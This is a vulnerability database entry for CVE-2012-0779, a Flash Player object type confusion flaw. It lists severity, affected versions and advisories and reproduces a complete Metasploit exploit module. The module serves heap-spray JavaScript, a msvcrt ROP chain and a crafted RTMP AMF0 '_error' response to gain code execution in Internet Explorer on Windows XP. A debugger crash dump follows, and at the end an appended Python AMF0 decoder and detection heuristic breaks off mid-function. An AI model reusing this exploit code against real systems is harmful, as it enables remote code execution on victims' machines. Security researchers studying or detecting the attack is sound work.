CVE-2012-0779
CVSS 9.3
Published: 2012-05-04 15:55:04
Revised: 2018-01-17 21:29:07

[Original] Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012.


[CNNVD] Adobe Flash Player Arbitrary Code Execution Vulnerability (CNNVD-201205-107)

        Adobe Flash Player is a high-performance, lightweight and highly expressive client-side runtime player.
        A vulnerability exists in Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X and Linux, before 11.1.111.9 on Android 2.x and 3.x, and before 11.1.115.8 on Android 4.x. A remote attacker can exploit this vulnerability to execute arbitrary code via a crafted file; the vulnerability is related to an "object confusion vulnerability".

- CVSS (base score)

CVSS score: 9.3 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:adobe:flash_player:6.0.21.0  Adobe Flash Player 6.0.21.0
cpe:/a:adobe:flash_player:6.0.79  Adobe Flash Player 6.0.79
cpe:/a:adobe:flash_player:7.0  Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.0.1  Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.0.14.0  Adobe Flash MX 2004 7.0.14.0
cpe:/a:adobe:flash_player:7.0.19.0  Adobe Flash MX 2004 7.0.19.0
cpe:/a:adobe:flash_player:7.0.24.0  Adobe Flash MX 2004 7.0.24.0
cpe:/a:adobe:flash_player:7.0.25  Adobe Flash Player 7.0.25
cpe:/a:adobe:flash_player:7.0.53.0  Adobe Flash MX 2004 7.0.53.0
cpe:/a:adobe:flash_player:7.0.60.0  Adobe Flash MX 2004 7.0.60.0
cpe:/a:adobe:flash_player:7.0.61.0  Adobe Flash MX 2004 7.0.61.0
cpe:/a:adobe:flash_player:7.0.63  Adobe Flash Player 7.0.63
cpe:/a:adobe:flash_player:7.0.66.0  Adobe Flash MX 2004 7.0.66.0
cpe:/a:adobe:flash_player:7.0.67.0  Adobe Flash MX 2004 7.0.67.0
cpe:/a:adobe:flash_player:7.0.68.0  Adobe Flash MX 2004 7.0.68.0
cpe:/a:adobe:flash_player:7.0.69.0  Adobe Flash Player 7.0.69.0
cpe:/a:adobe:flash_player:7.0.70.0  Adobe Flash Player 7.0.70.0
cpe:/a:adobe:flash_player:7.0.73.0  Adobe Flash MX 2004 7.0.73.0
cpe:/a:adobe:flash_player:7.1  Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.1.1  Adobe Flash MX 2004
cpe:/a:adobe:flash_player:7.2  Adobe Flash MX 2004
cpe:/a:adobe:flash_player:8.0  Adobe Flash Player 8.0
cpe:/a:adobe:flash_player:8.0.22.0  Adobe Flash Player 8.0.22.0
cpe:/a:adobe:flash_player:8.0.24.0  Adobe Flash 8.0.24.0
cpe:/a:adobe:flash_player:8.0.33.0  Adobe Flash Player 8.0.33.0
cpe:/a:adobe:flash_player:8.0.34.0  Adobe Flash Player 8.0.34.0
cpe:/a:adobe:flash_player:8.0.35.0  Adobe Flash Player 8.0.35.0
cpe:/a:adobe:flash_player:8.0.39.0  Adobe Flash Player 8.0.39.0
cpe:/a:adobe:flash_player:8.0.42.0  Adobe Flash Player 8.0.42.0
cpe:/a:adobe:flash_player:9.0.8.0  Adobe Flash Player 9.0.8.0
cpe:/a:adobe:flash_player:9.0.9.0  Adobe Flash Player 9.0.289.0
cpe:/a:adobe:flash_player:9.0.16  Adobe Flash Player 9.0.16
cpe:/a:adobe:flash_player:9.0.18d60  Adobe Flash Player 9.0.18d60
cpe:/a:adobe:flash_player:9.0.20  Adobe Flash Player 9.0.20
cpe:/a:adobe:flash_player:9.0.20.0  Adobe Flash Player 9.0.20.0
cpe:/a:adobe:flash_player:9.0.28  Adobe Flash Player 9.0.28
cpe:/a:adobe:flash_player:9.0.28.0  Adobe Flash Player 9.0.28.0
cpe:/a:adobe:flash_player:9.0.31  Adobe Flash Player 9.0.31
cpe:/a:adobe:flash_player:9.0.31.0  Adobe Flash Player 9.0.31.0
cpe:/a:adobe:flash_player:9.0.45.0  Adobe Flash Player 9.0.45.0
cpe:/a:adobe:flash_player:9.0.47.0  Adobe Flash Player 9.0.47.0
cpe:/a:adobe:flash_player:9.0.48.0  Adobe Flash Player 9.0.48.0
cpe:/a:adobe:flash_player:9.0.112.0  Adobe Flash Player 9.0.112.0
cpe:/a:adobe:flash_player:9.0.114.0  Adobe Flash Player 9.0.114.0
cpe:/a:adobe:flash_player:9.0.115.0  Adobe Flash Player 9.0.115.0
cpe:/a:adobe:flash_player:9.0.124.0  Adobe Flash Player 9.0.124.0
cpe:/a:adobe:flash_player:9.0.125.0  Adobe Flash Player 9.0.125.0
cpe:/a:adobe:flash_player:9.0.151.0  Adobe Flash Player 9.0.151.0
cpe:/a:adobe:flash_player:9.0.152.0  Adobe Flash Player 9.0.152.0
cpe:/a:adobe:flash_player:9.0.155.0  Adobe Flash 9.0.155.0
cpe:/a:adobe:flash_player:9.0.159.0  Adobe Flash Player 9.0.159.0
cpe:/a:adobe:flash_player:9.0.246.0  Adobe Flash Player 9.0.246.0
cpe:/a:adobe:flash_player:9.0.260.0  Adobe Flash Player 9.0.260.0
cpe:/a:adobe:flash_player:9.0.262.0  Adobe Flash Player 9.0.262.0
cpe:/a:adobe:flash_player:9.0.277.0  Adobe Flash Player 9.0.277.0
cpe:/a:adobe:flash_player:9.0.280  Adobe Flash Player 9.0.280
cpe:/a:adobe:flash_player:9.0.283.0  Adobe Flash Player 9.0.283.0
cpe:/a:adobe:flash_player:9.125.0  Adobe Flash Player 9.125.0
cpe:/a:adobe:flash_player:10.0.0.584  Adobe Flash Player 10.0.0.584
cpe:/a:adobe:flash_player:10.0.2.54  Adobe Flash Player 10.0.2.54
cpe:/a:adobe:flash_player:10.0.12.10  Adobe Flash Player 10.0.12.10
cpe:/a:adobe:flash_player:10.0.12.36  Adobe Flash Player 10.0.12.36
cpe:/a:adobe:flash_player:10.0.15.3  Adobe Flash Player 10.0.15.3
cpe:/a:adobe:flash_player:10.0.22.87  Adobe Flash Player 10.0.22.87
cpe:/a:adobe:flash_player:10.0.32.18  Adobe Flash Player 10.0.32.18
cpe:/a:adobe:flash_player:10.0.42.34  Adobe Flash Player 10.0.42.34
cpe:/a:adobe:flash_player:10.0.45.2  Adobe Flash Player 10.0.45.2
cpe:/a:adobe:flash_player:10.1  Adobe Flash Player 10.1
cpe:/a:adobe:flash_player:10.1.52.14  Adobe Flash Player 10.1.52.14
cpe:/a:adobe:flash_player:10.1.52.14.1  Adobe Flash Player 10.1.52.14.1
cpe:/a:adobe:flash_player:10.1.52.15  Adobe Flash Player 10.1.52.15
cpe:/a:adobe:flash_player:10.1.53.64  Adobe Flash Player 10.1.53.64
cpe:/a:adobe:flash_player:10.1.82.76  Adobe Flash Player 10.1.82.76
cpe:/a:adobe:flash_player:10.1.85.3  Adobe Flash Player 10.1.85.3
cpe:/a:adobe:flash_player:10.1.92.8  Adobe Flash Player 10.1.92.8
cpe:/a:adobe:flash_player:10.1.92.10  Adobe Flash Player 10.1.92.10
cpe:/a:adobe:flash_player:10.1.95.1  Adobe Flash Player 10.1.95.1
cpe:/a:adobe:flash_player:10.1.95.2  Adobe Flash Player 10.1.95.2
cpe:/a:adobe:flash_player:10.1.102.64  Adobe Flash Player 10.1.102.64
cpe:/a:adobe:flash_player:10.1.105.6  Adobe Flash Player 10.1.105.6
cpe:/a:adobe:flash_player:10.1.106.16  Adobe Flash Player 10.1.106.16
cpe:/a:adobe:flash_player:10.2.152  Adobe Flash Player 10.2.152
cpe:/a:adobe:flash_player:10.2.152.26  Adobe Flash Player 10.2.152.26
cpe:/a:adobe:flash_player:10.2.152.32  Adobe Flash Player 10.2.152.32
cpe:/a:adobe:flash_player:10.2.152.33  Adobe Flash Player 10.2.152.33
cpe:/a:adobe:flash_player:10.2.153.1  Adobe Flash Player 10.2.153.1
cpe:/a:adobe:flash_player:10.2.154.13  Adobe Flash Player 10.2.154.13
cpe:/a:adobe:flash_player:10.2.154.25  Adobe Flash Player 10.2.154.25
cpe:/a:adobe:flash_player:10.2.156.12  Adobe Flash Player 10.2.156.12
cpe:/a:adobe:flash_player:10.2.157.51  Adobe Flash Player 10.2.157.51
cpe:/a:adobe:flash_player:10.2.159.1  Adobe Flash Player 10.2.159.1
cpe:/a:adobe:flash_player:10.3.181.14  Adobe Flash Player 10.3.181.14
cpe:/a:adobe:flash_player:10.3.181.16  Adobe Flash Player 10.3.181.16
cpe:/a:adobe:flash_player:10.3.181.22  Adobe Flash Player 10.3.181.22
cpe:/a:adobe:flash_player:10.3.181.23  Adobe Flash Player 10.3.181.23
cpe:/a:adobe:flash_player:10.3.181.26  Adobe Flash Player 10.3.181.26
cpe:/a:adobe:flash_player:10.3.181.34  Adobe Flash Player 10.3.181.34
cpe:/a:adobe:flash_player:10.3.183.5  Adobe Flash Player 10.3.183.5
cpe:/a:adobe:flash_player:10.3.183.7  Adobe Flash Player 10.3.183.7
cpe:/a:adobe:flash_player:10.3.183.10  Adobe Flash Player 10.3.183.10
cpe:/a:adobe:flash_player:10.3.183.11  Adobe Flash Player 10.3.183.11
cpe:/a:adobe:flash_player:10.3.183.15  Adobe Flash Player 10.3.183.15
cpe:/a:adobe:flash_player:10.3.183.16  Adobe Flash Player 10.3.183.16
cpe:/a:adobe:flash_player:10.3.183.18  Adobe Flash Player 10.3.183.18
cpe:/a:adobe:flash_player:10.3.185.22  Adobe Flash Player 10.3.185.22
cpe:/a:adobe:flash_player:11.0  Adobe Flash Player 11.0
cpe:/a:adobe:flash_player:11.0.1.152  Adobe Flash Player 11.0.1.152
cpe:/a:adobe:flash_player:11.0.1.152::~~~~x64~
cpe:/a:adobe:flash_player:11.0.1.153  Adobe Flash Player 11.0.1.153
cpe:/a:adobe:flash_player:11.1  Adobe Flash Player 11.1
cpe:/a:adobe:flash_player:11.1.102.55  Adobe Flash Player 11.1.102.55
cpe:/a:adobe:flash_player:11.1.102.55::~~~~x64~
cpe:/a:adobe:flash_player:11.1.102.62  Adobe Flash Player 11.1.102.62
cpe:/a:adobe:flash_player:11.1.102.63  Adobe Flash Player 11.1.102.63
cpe:/a:adobe:flash_player:11.1.111.8  Adobe Flash Player 11.1.111.8
cpe:/a:adobe:flash_player:11.1.115.7  Adobe Flash Player 11.1.115.7
cpe:/a:adobe:flash_player:11.2.202.228  Adobe Flash Player 11.2.202.228
cpe:/a:adobe:flash_player:11.2.202.233  Adobe Flash Player 11.2.202.233

- OVAL (technical details for detection)

oval:org.mitre.oval:def:20472  Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows allows remote attackers to execute arbitrary code via a crafte...
oval:org.mitre.oval:def:21162  RHSA-2012:0688: flash-plugin security update (Critical)
oval:org.mitre.oval:def:23705  ELSA-2012:0688: flash-plugin security update (Critical)
oval:org.mitre.oval:def:25131  ELSA-2012:0688: flash-plugin security update (Critical)
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions give further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0779
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-201205-107
(official data source) CNNVD

- Other links and resources

http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00004.html
(UNKNOWN)  SUSE  SUSE-SU-2012:0592
http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00005.html
(UNKNOWN)  SUSE  openSUSE-SU-2012:0594
http://rhn.redhat.com/errata/RHSA-2012-0688.html
(UNKNOWN)  REDHAT  RHSA-2012:0688
http://www.adobe.com/support/security/bulletins/apsb12-09.html
(VENDOR_ADVISORY)  CONFIRM  http://www.adobe.com/support/security/bulletins/apsb12-09.html
http://www.securityfocus.com/bid/53395
(UNKNOWN)  BID  53395
http://www.securitytracker.com/id?1027023
(UNKNOWN)  SECTRACK  1027023
https://exchange.xforce.ibmcloud.com/vulnerabilities/75383
(UNKNOWN)  XF  adobe-flash-objecttype-code-exec(75383)

- Vulnerability information

Adobe Flash Player Arbitrary Code Execution Vulnerability
High risk  Insufficient data
2012-05-07 00:00:00 2013-03-27 00:00:00
Remote

- Advisory and patch

        The vendor has released an upgrade patch to fix this security issue; the patch can be obtained at:
        http://www.adobe.com/support/security/bulletins/apsb12-09.html

- Vulnerability information (19369)

Adobe Flash Player Object Type Confusion (EDBID:19369)
windows remote
2012-06-25 Verified
0 metasploit
N/A [Download]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:method     => "GetVariable",
		:classid    => "ShockwaveFlash.ShockwaveFlash",
		:rank       => NormalRanking, # reliable memory corruption
		:javascript => true
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Adobe Flash Player Object Type Confusion",
			'Description'    => %q{
				This module exploits a vulnerability found in Adobe Flash
				Player.  By supplying a corrupt AMF0 "_error" response, it
				is possible to gain arbitrary remote code execution under
				the context of the user.

				This vulnerability has been exploited in the wild as part of
				the "World Uyghur Congress Invitation.doc" e-mail attack.
				According to the advisory, 10.3.183.19 and 11.x before
				11.2.202.235 are affected.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'sinn3r', # Metasploit module
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-0779' ],
					[ 'OSVDB', '81656'],
					[ 'BID', '53395' ],
					[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info
					[ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]
				],
			'Payload'        =>
				{
					#'Space'    => 1024,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Flash Player 11.2.202.228
					[ 'Automatic', {} ],
					[
						'IE 6 on Windows XP SP3',
						{
							'Rop'    => nil,
							'RandomHeap' => false,
							'Offset' => '0x0'
						}
					],
					[
						'IE 7 on Windows XP SP3',
						{
							'Rop'    => nil,
							'RandomHeap' => false,
							'Offset' => '0x0'
						}
					],
					[
						'IE 8 on Windows XP SP3 with msvcrt ROP',
						{
							'Rop' => :msvcrt,
							'RandomHeap' => false,
							'Offset' => '238',
							'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 04 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
				OptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
				OptPort.new('RTMPPORT',    [ true, "The local port to RTMP service listen on.", 1935 ]),
			], self.class
		)

	end

	def get_target(agent)
		# If the target was already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[3]  #IE 8 on Windows XP SP3
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V").first
	end

	def nop
		return make_nops(4).unpack("V").first
	end

	def ret(t)
		return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
	end

	def popret(t)
		return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
	end

	def get_rop_chain(t)

		# ROP chains generated by mona.py - See corelan.be
		print_status("Using msvcrt ROP")
		rop =
			[
				0x77c4e392,  # POP EAX # RETN
				0x77c11120,  # <- *&VirtualProtect()
				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
				junk,
				0x77c2dd6c,
				0x77c4ec00,  # POP EBP # RETN
				0x77c35459,  # ptr to 'push esp #  ret'
				0x77c47705,  # POP EBX # RETN
				0x00001000,  # EBX
				0x77c3ea01,  # POP ECX # RETN
				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
				0x77c46100,  # POP EDI # RETN
				0x77c46101,  # ROP NOP (-> edi)
				0x77c4d680,  # POP EDX # RETN
				0x00000040,  # newProtect (0x40) (-> edx)
				0x77c4e392,  # POP EAX # RETN
				nop,         # NOPS (-> eax)
				0x77c12df9,  # PUSHAD # RETN
			].pack("V*")

		code = ret(t)
		code << rand_text(119)
		code << rop
		code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
		code << payload.encoded
		offset = 2616 - code.length
		code << rand_text(offset)
		code << [ t['StackPivot'] ].pack("V")
		return code
	end

	def get_easy_spray(t, js_code, js_nops)

		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);


		heap_obj.gc();
		for (var z=1; z < 0x185; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end


	def get_aligned_spray(t, js_rop, js_nops)

		spray = <<-JS

		var heap_obj = new heapLib.ie(0x20000);
		var nops = unescape("#{js_nops}");
		var rop_chain = unescape("#{js_rop}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);


		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);


		heap_obj.gc();
		for (var z=1; z < 0x1c5; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end

	def exploit
		@swf = create_swf

		# Boilerplate required to handle pivoted listeners
		comm = datastore['ListenerComm']
		if comm == "local"
			comm = ::Rex::Socket::Comm::Local
		else
			comm = nil
		end

		@rtmp_listener = Rex::Socket::TcpServer.create(
			'LocalHost' => datastore['RTMPHOST'],
			'LocalPort' => datastore['RTMPPORT'],
			'Comm'      => comm,
			'Context'   => {
				'Msf'        => framework,
				'MsfExploit' => self,
			}
		)

		# Register callbacks
		@rtmp_listener.on_client_connect_proc = Proc.new { |cli|
			add_socket(cli)
			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")
			on_rtmp_connect(cli)
		}

		@rtmp_listener.start

		super
	end

	def my_read(cli,size,timeout=nil)
		if timeout.nil?
			timeout = cli.def_read_timeout
		end

		buf = ""
		::Timeout::timeout(timeout) {
			while buf.length < size
			buf << cli.get_once(size - buf.length)
			end
		}
		buf
	end

	def do_handshake(cli)
		c0 = my_read(cli, 1)
		c1 = my_read(cli, 1536) # HandshakeSize => 1536
		s0 = "\3" # s0
		s1 = Rex::Text.rand_text(4) # s1.time
		s1 << "\x00\x00\x00\x00" # s1.zero
		s1 << Rex::Text.rand_text(1528) # s1.random_data
		s2 = c1 # s2
		cli.put(s0)
		cli.put(s1)
		cli.put(s2)
		c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)
	end

	def on_rtmp_connect(cli)

		begin
			do_handshake(cli)
			request = my_read(cli, 341) # connect request length

			case request
			when /connect/
				rtmp_header = "\x03" # Chunk Stream ID
				rtmp_header << "\x00\x00\x00" # Timestamp
				rtmp_header << "\x00\x00\x71" # Body Size
				rtmp_header << "\x14" # AMF0 Command
				rtmp_header << "\x00\x00\x00\x00" # Stream ID

				# String
				rtmp_body = "\x02" # String
				rtmp_body << "\x00\x06" # String length
				rtmp_body << "\x5f\x65\x72\x72\x6f\x72" # String: _error
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << "\x40\x00\x00\x00\x00\x00\x00\x00" # Number
				# Array
				rtmp_body << "\x0a" # AMF Type: Array
				rtmp_body << "\x00\x00\x00\x05" # Array length: 5
				# Array elements
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Crafted Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x0c\x0c\x0c\x0c" # Modify the "\x0c\x0c\x0c\x0c" to do an arbitrary call
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") +  "\x00\x00\x00\x00" # Number

				trigger = rtmp_header
				trigger << rtmp_body

				cli.put(trigger)
				@rtmp_listener.close_client(cli)
			end
		rescue
		ensure
			@rtmp_listener.close_client(cli)
			remove_socket(cli)
		end

	end

	def cleanup
		super
		return if not @rtmp_listener
		begin
			@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)
			if @rtmp_listener.kind_of?(Rex::Socket)
				@rtmp_listener.close
				@rtmp_listener.stop
			end
			@rtmp_listener = nil
		rescue ::Exception
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		print_status("Client requesting: #{request.uri}")

		if request.uri =~ /\.swf$/
			print_status("Sending Exploit SWF")
			send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
			return
		end

		p = payload.encoded
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

		if not my_target['Rop'].nil?
			js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
			js = get_aligned_spray(my_target, js_rop, js_nops)
		else
			js = get_easy_spray(my_target, js_code, js_nops)
		end

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
		swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

		if datastore['RTMPHOST'] == '0.0.0.0'
			rtmp_host = Rex::Socket.source_address('1.2.3.4')
		else
			rtmp_host = datastore['RTMPHOST']
		end

		rtmp_port = datastore['RTMPPORT']

		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<center>
		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
		id="test" width="1" height="1"
		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
		<param name="movie" value="#{swf_uri}" />
		<param name="FlashVars" value="var1=#{rtmp_host}&var2=#{rtmp_port}"
		<embed src="#{swf_uri}" quality="high"
		width="1" height="1" name="test" align="middle"
		allowNetworking="all"
		type="application/x-shockwave-flash"
		pluginspage="http://www.macromedia.com/go/getflashplayer"
		FlashVars="var1=#{rtmp_host}&var2=#{rtmp_port}">
		</embed>

		</object>
		</center>

		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def create_swf
		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )
		fd = ::File.open( path, "rb" )
		swf = fd.read(fd.stat.size)
		fd.close

		return swf
	end

end

=begin

* Flash Player 11.2.202.228

(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000
eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
ds:0023:44444470=????????

0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
104b1b30 53              push    ebx
104b1b31 ffd0            call    eax

=end
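As an added example (not part of the Metasploit module or of this page), a Python decoder for the RTMP fmt-0 chunk header and AMF0 command body laid out in on_rtmp_connect above, plus a heuristic (an assumption of mine, not a vendor signature) that reports an `_error` response whose payload is a strict Array instead of the null command object and info Object a well-formed RTMP error response carries. Both sample messages are constructed inline.

```python
import struct

# AMF0 type markers used by the command message in on_rtmp_connect
AMF0_NUMBER, AMF0_STRING, AMF0_OBJECT = 0x00, 0x02, 0x03
AMF0_NULL, AMF0_OBJECT_END, AMF0_STRICT_ARRAY = 0x05, 0x09, 0x0A
RTMP_AMF0_COMMAND = 0x14  # message type byte of the chunk the module sends


def _decode_value(buf, pos):
    """Decode one AMF0 value at pos; return (python_value, position after it)."""
    marker = buf[pos]
    pos += 1
    if marker == AMF0_NUMBER:          # big-endian IEEE-754 double
        return struct.unpack_from(">d", buf, pos)[0], pos + 8
    if marker == AMF0_STRING:          # u16 length + UTF-8 bytes
        (length,) = struct.unpack_from(">H", buf, pos)
        pos += 2
        return buf[pos:pos + length].decode("utf-8"), pos + length
    if marker == AMF0_NULL:
        return None, pos
    if marker == AMF0_STRICT_ARRAY:    # u32 count + that many values
        (count,) = struct.unpack_from(">I", buf, pos)
        pos += 4
        items = []
        for _ in range(count):
            item, pos = _decode_value(buf, pos)
            items.append(item)
        return items, pos
    if marker == AMF0_OBJECT:          # (u16 keylen, key, value)* then 0x00 0x00 0x09
        obj = {}
        while True:
            (klen,) = struct.unpack_from(">H", buf, pos)
            pos += 2
            key = buf[pos:pos + klen].decode("utf-8")
            pos += klen
            if klen == 0 and buf[pos] == AMF0_OBJECT_END:
                return obj, pos + 1
            obj[key], pos = _decode_value(buf, pos)
    raise ValueError("unsupported AMF0 marker 0x%02x at offset %d" % (marker, pos - 1))


def decode_amf0_command(chunk):
    """Parse an RTMP fmt-0 chunk (12-byte header) and every AMF0 value in its body."""
    if len(chunk) < 12:
        raise ValueError("truncated RTMP chunk header")
    fmt, csid = chunk[0] >> 6, chunk[0] & 0x3F
    if fmt != 0:
        raise ValueError("only fmt-0 (full) chunk headers are handled here")
    timestamp = int.from_bytes(chunk[1:4], "big")
    body_size = int.from_bytes(chunk[4:7], "big")     # the module's "\x00\x00\x71"
    msg_type = chunk[7]
    stream_id = struct.unpack_from("<I", chunk, 8)[0]  # message stream id is little-endian
    body = chunk[12:12 + body_size]
    if len(body) != body_size:
        raise ValueError("body shorter than the declared size")
    values, pos = [], 0
    while pos < len(body):
        value, pos = _decode_value(body, pos)
        values.append(value)
    return {"csid": csid, "timestamp": timestamp, "type": msg_type,
            "stream_id": stream_id, "values": values}


def error_response_anomalies(msg):
    """Heuristic (assumption): a well-formed `_error` is [name, txid, null, info Object],
    so a strict Array in a payload position is reported."""
    findings = []
    vals = msg["values"]
    if msg["type"] != RTMP_AMF0_COMMAND or not vals or vals[0] != "_error":
        return findings
    if len(vals) < 2 or not isinstance(vals[1], float):
        findings.append("transaction id is not an AMF0 Number")
    for value in vals[2:]:
        if isinstance(value, list):
            findings.append("strict Array payload where an Object is expected")
    return findings


def _chunk(body):
    """Wrap an AMF0 body in the same fmt-0 header layout the module uses (csid 3)."""
    return (b"\x03" + b"\x00\x00\x00" + len(body).to_bytes(3, "big")
            + bytes([RTMP_AMF0_COMMAND]) + b"\x00\x00\x00\x00" + body)


def _amf_str(s):
    return b"\x02" + struct.pack(">H", len(s)) + s.encode("utf-8")


def constructed_array_error_response():
    """Constructed sample (not captured traffic): `_error`, txid 1.0, Array of three Numbers."""
    body = _amf_str("_error") + b"\x00" + struct.pack(">d", 1.0)
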